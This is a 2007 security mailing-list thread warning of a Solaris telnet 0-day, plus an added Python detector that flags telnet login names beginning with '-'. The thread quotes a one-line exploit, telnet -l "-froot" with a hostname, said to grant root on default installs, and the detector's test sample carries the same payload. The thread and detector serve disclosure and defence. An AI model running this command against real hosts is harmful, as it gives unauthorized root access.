[Dshield] Solaris Telnet 0-day (Important!)

Gadi Evron ge at linuxbox.org
Mon Feb 12 03:11:23 GMT 2007


On Sun, 11 Feb 2007, Brendan Dolan-Gavitt wrote:
> WOW that's a stupid hole :) The same bug was found in rlogin in AIX
> sometime around 1994  (see
> http://www.cert.org/advisories/CA-1994-09.html for details). If
> Solaris 10 & 11 are truly vulnerable to this bug, Sun deserves a
> *swift* kick to the head.

Yeah, they still come with telnet installed?

> 
> -Brendan
> 
> On 2/11/07, Johannes B. Ullrich <jullrich at sans.org> wrote:
> >
> > If you run Solaris, please check if you got telnet enabled NOW. If you
> > can, block port 23 at your perimeter. There is a fairly trivial Solaris
> > telnet 0-day.
> >
> > telnet -l "-froot" [hostname]
> >
> > will give you root on many Solaris systems with default installs.
> > We are still testing. Please use our contact form at
> > https://isc.sans.org/contact.html
> > if you have any details about the use of this exploit.
> >
> >
> >
> > --
> > ---------
> > Johannes Ullrich                        http://isc.sans.org
> >
> > SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> > taught by our top rated instructors plus a huge vendor tools expo.
> >         Register Today! <http://www.sans.org/info/2501>
> > (Brochurecode: ISC)
> >
> > PGP Key: https://secure.dshield.org/PGPKEYS
> >
> >
> 
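
Added example, not part of the original thread: a Python sketch of a detection check for the login name quoted above, assuming the telnet client sends the -l value as the USER variable in a NEW-ENVIRON subnegotiation (RFC 1572). It flags any USER value that begins with "-", which generalizes beyond the single string in the advisory; the function names and both sample byte streams are constructed for illustration.

```python
IAC, SB, SE, WILL = 255, 250, 240, 251   # telnet command bytes
NEW_ENVIRON = 39                         # option number, RFC 1572
IS, INFO = 0, 2                          # payload types that carry values
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3    # field markers inside the payload

def subnegotiations(stream):
    """Yield (option, payload) for every IAC SB ... IAC SE in the stream."""
    i = 0
    while i + 2 < len(stream):
        if stream[i] == IAC and stream[i + 1] == SB:
            opt, j, buf = stream[i + 2], i + 3, bytearray()
            while j + 1 < len(stream) and stream[j:j + 2] != bytes([IAC, SE]):
                j += 1 if stream[j] != IAC else 2   # IAC IAC is one escaped 0xFF
                buf.append(stream[j - 1])
            if j + 1 < len(stream):                 # terminated properly
                yield opt, bytes(buf)
            i = j + 2
        else:
            i += 2 if stream[i:i + 2] == bytes([IAC, IAC]) else 1

def env_vars(payload):
    """Decode an IS/INFO payload into {name: value}, honouring ESC."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    tokens, i = [], 1
    while i < len(payload):
        b = payload[i]
        if b == ESC and i + 1 < len(payload):       # next byte is literal
            i += 1
            if tokens:
                tokens[-1][1].append(payload[i])
        elif b in (VAR, VALUE, USERVAR):            # start of a new field
            tokens.append((b, bytearray()))
        elif tokens:
            tokens[-1][1].append(b)
        i += 1
    env, name = {}, None
    for kind, data in tokens:
        if kind == VALUE and name is not None:
            env[name] = data.decode("latin-1")
        elif kind != VALUE:
            name = data.decode("latin-1")
            env.setdefault(name, "")
    return env

def suspicious_users(stream):
    """Return USER values that start with '-' and would reach login as an option."""
    found = (env_vars(p).get("USER", "") for o, p in subnegotiations(stream) if o == NEW_ENVIRON)
    return [u for u in found if u.startswith("-")]

# Constructed client-to-server samples: option offer, then the USER variable.
_HEAD = bytes([IAC, WILL, NEW_ENVIRON, IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER" + bytes([VALUE])
BENIGN = _HEAD + b"alice" + bytes([IAC, SE])
FLAGGED = _HEAD + b"-froot" + bytes([IAC, SE])
```

The parser covers only NEW-ENVIRON (option 39); the older ENVIRON option is not decoded here.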


